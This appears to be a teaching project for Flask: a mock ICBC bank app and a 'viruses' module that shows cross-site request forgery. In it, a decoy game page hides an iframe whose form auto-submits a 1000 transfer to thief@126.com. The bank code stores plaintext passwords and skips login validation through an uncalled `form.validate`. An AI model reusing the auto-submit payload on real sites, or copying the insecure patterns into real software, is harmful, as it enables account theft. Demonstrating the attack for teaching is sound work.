apps/icbc/models.py
#encoding: utf-8

from config import Base
from sqlalchemy import Column, Integer, String, Float

class User(Base):
    __tablename__ = 'user'
    id = Column(Integer, primary_key=True)
    email = Column(String(50), nullable=False)
    username = Column(String(50), nullable=False)
    password = Column(String(50), nullable=False)
    deposit = Column(Float(50), default=0)


Base.metadata.create_all()

apps/icbc/forms.py
#encoding: utf-8
from wtforms import Form, StringField, FloatField
from wtforms.validators import Email, Length, EqualTo, InputRequired, NumberRange

class RegistForm(Form):
    email = StringField(validators=[Email()])
    username = StringField(validators=[Length(3, 20)])
    password = StringField(validators=[Length(6, 20)])
    repassword = StringField(validators=[EqualTo('password')])
    deposit = FloatField(validators=[InputRequired()])  # 余额


class LoginForm(Form):
    email = StringField(validators=[Email()])
    password = StringField(validators=[Length(6, 20)])


class TransferForm(Form):
    email = StringField(validators=[Email()])
    money = FloatField(validators=[NumberRange(1, 100000)])

app.py
from flask import Flask
from apps.icbc.views import bp as icbc_bp
from apps.viruses.views import bp as viruses_bp
from flask_wtf import CSRFProtect

app = Flask(__name__)
app.config.from_pyfile('config.py')
app.register_blueprint(icbc_bp)
app.register_blueprint(viruses_bp)

CSRFProtect(app)

if __name__ == '__main__':
    app.run()

apps/icbc/__init__.py
#encoding: utf-8

import apps.icbc.hooks

apps/icbc/views.py
#encoding: utf-8
from flask import Blueprint, request, render_template, session, g
from flask import views
from .forms import RegistForm, LoginForm, TransferForm
from apps.icbc.models import User
from config import session as db_session
from apps.icbc.decorators import loginRequired

bp = Blueprint('icbc', __name__)


@bp.route('/')
def index():
    return render_template('icbc/index.html')


class RegistView(views.MethodView):
    def get(self):
        return render_template("icbc/regist.html")

    def post(self):
        form = RegistForm(request.form)
        if form.validate():
            email = form.email.data
            username = form.username.data
            password = form.password.data
            deposit = form.deposit.data
            user = User(
                email = email,
                username = username,
                password = password,
                deposit = deposit
            )
            db_session.add(user)
            db_session.commit()
            return '注册成功！'
        else:
            print(form.errors)
            return '注册失败'


class LoginView(views.MethodView):
    def get(self):
        return render_template('icbc/login.html')

    def post(self):
        form = LoginForm(request.form)
        print(request.form)
        if form.validate:
            email = form.email.data
            password = form.password.data
            user = db_session.query(User).filter(User.email==email, User.password==password).first()
            if user:  # 如果存在此用户
                session['user_id'] = user.id
                return '登陆成功'
            else:
                return '用户或密码错误'
        else:
            print(form.errors)
            return self.get()


class TransferView(views.MethodView):
    def get(self):
        return render_template('icbc/transfer.html')

    decorators = [loginRequired]
    def post(self):
        csrf_token = request.form.get('csrf_token')
        form = TransferForm(request.form)
        if form.validate():
            email = form.email.data
            money = form.money.data
            id = session['user_id']
            # 转账发起人
            user_s = db_session.query(User).filter(User.id==id).first()
            # 转账接收者
            user_t = db_session.query(User).filter(User.email==email).first()
            # 判断转账发起人的余额是否大于要转账的金额
            if user_s.deposit >= money:
                user_s.deposit -= money
                user_t.deposit += money
                db_session.commit()
                return '转账成功'
            else:
                return '余额不足'
        else:
            print(form.errors)
            return self.get()

bp.add_url_rule('/regist/', view_func=RegistView.as_view('regist'))
bp.add_url_rule('/login/', view_func=LoginView.as_view('login'))
bp.add_url_rule('/transfer/', view_func=TransferView.as_view('transfer'))

apps/viruses/views.py
#encoding: utf-8
from flask import Blueprint, request, render_template

bp = Blueprint('viruses', __name__, url_prefix='/v')

@bp.route('/')
def index():
    return render_template('viruses/index.html')


@bp.route('/transfer/')
def transfer():
    return render_template('viruses/transfer.html')

templates/icbc/index.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>中国工商银行首页</title>
</head>
<body>
    <h1>欢迎来到工商银行首页</h1>
    <ul>
        <li><a href="{{ url_for("icbc.regist") }}">立即注册</a></li>
        <li><a href="{{ url_for("icbc.login") }}">立即登陆</a></li>
        <li><a href="{{ url_for("icbc.transfer") }}">转账</a></li>
    </ul>
</body>
</html>

templates/icbc/login.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="csrf_token" content="{{ csrf_token() }}">
    <title>工商银行登陆界面</title>
    <script src="{{ url_for('static', filename="jquery.min.js") }}"></script>
    <script src="{{ url_for('static', filename="icbc/login.js") }}"></script>
    <script src="{{ url_for('static', filename="icbc/yioajax.js") }}"></script>
</head>
<body>
<form action="" method="post">
    <input type="hidden" name="csrf_token" value="{{ csrf_token() }}">
    <table>
        <tr>
            <td>邮箱:</td>
            <td><input type="email" name="email"></td>
        </tr>
        <tr>
            <td>密码:</td>
            <td><input type="password" name="password"></td>
        </tr>
        <tr>
            <td></td>
            <td><input type="submit" value="登陆" id="submit"></td>
        </tr>
    </table>

</form>
</body>
</html>

templates/icbc/regist.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>中国工商银行注册页面</title>
</head>
<body>
<form action="" method="post">
    <table>
        <tr>
            <td>邮箱</td>
            <td><input type="email" name="email"></td>
        </tr>
        <tr>
            <td>用户名</td>
            <td><input type="text" name="username"></td>
        </tr>
        <tr>
            <td>密码</td>
            <td><input type="password" name="password"></td>
        </tr>
        <tr>
            <td>重复密码</td>
            <td><input type="password" name="repassword"></td>
        </tr>
        <tr>
            <td>余额</td>
            <td><input type="text" name="deposit"></td>
        </tr>
        <tr>
            <td></td>
            <td><input type="submit" value="注册"></td>
        </tr>
    </table>
</form>
</body>
</html>

templates/icbc/transfer.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>工商银行转账页面</title>
</head>
<body>
<form action="" method="post">
    <input type="hidden" name="csrf_token" value="{{ csrf_token() }}">
    <table>
        <tr>
            <td>转账给：</td>
            <td><input type="text" name="email"></td>
        </tr>
        <tr>
            <td>金额</td>
            <td><input type="text" name="money"></td>
        </tr>
        <tr>
            <td></td>
            <td><input type="submit" value="转账"></td>
        </tr>
    </table>
</form>
</body>
</html>

templates/viruses/index.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>是男人就下一百层</title>

</head>
<body>
<img src="{{ url_for('static', filename='viruses/1.jpg') }}" alt=""
    width="100%" height="100%"
>
<iframe src="{{ url_for('viruses.transfer') }}" frameborder="0" width="0" height="0"></iframe>

</body>
</html>

templates/viruses/transfer.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="{{ url_for('static', filename='jquery.min.js') }}"></script>
    <script>
        $(function () {
            $('form').submit();
        });
    </script>
</head>
<body>
    <form action="http://localhost:5000/transfer/" method="post">
    <table>
        <tr>
            <td><input type="text" name="email" value="thief@126.com"></td>
        </tr>
        <tr>
            <td><input type="text" name="money" value="1000"></td>
        </tr>
        <tr>
        </tr>
    </table>

</form>
</body>
</html>